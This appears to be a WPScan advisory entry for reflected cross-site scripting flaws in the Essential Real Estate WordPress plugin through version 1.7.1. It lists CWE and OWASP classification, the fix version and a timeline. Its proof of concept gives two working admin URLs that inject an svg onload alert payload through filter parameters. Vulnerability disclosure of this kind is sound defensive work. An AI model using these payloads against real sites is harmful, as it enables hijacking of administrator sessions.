Essential Real Estate <= 1.7.1 - XSS



Description
Multiple XSS across the plugin
Proof of Concept
Example:
https://<BLOG>/wp-admin/edit.php?post_status=all&post_type=user_package&package_user="><svg/onload=alert(/XSS/)>&filter_action=Filter&paged=1

https://<BLOG>/wp-admin/edit.php?post_status=all&post_type=property&property_author="><svg/onload=alert(/XSS/)>&property_identity&filter_action=Filter&paged=1

Affects Plugin

fixed in version 1.7.2

References

URL https://plugins.trac.wordpress.org/changeset?reponame=&new=2116720%40essential-real-estate&old=2076136%40essential-real-estate

Classification

Type XSS
OWASP Top 10 A3: Cross-Site Scripting (XSS)
CWE CWE-79

Miscellaneous

Views 887
Verified No
WPVDB ID 9421

Timeline

Publicly Published 2019-06-29 (25 days ago)
Added 2019-07-04 (19 days ago)
Last Updated 2019-07-04 (19 days ago)

Our Other Services

Online WordPress Vulnerability Scanner WPScan WordPress Security Plugin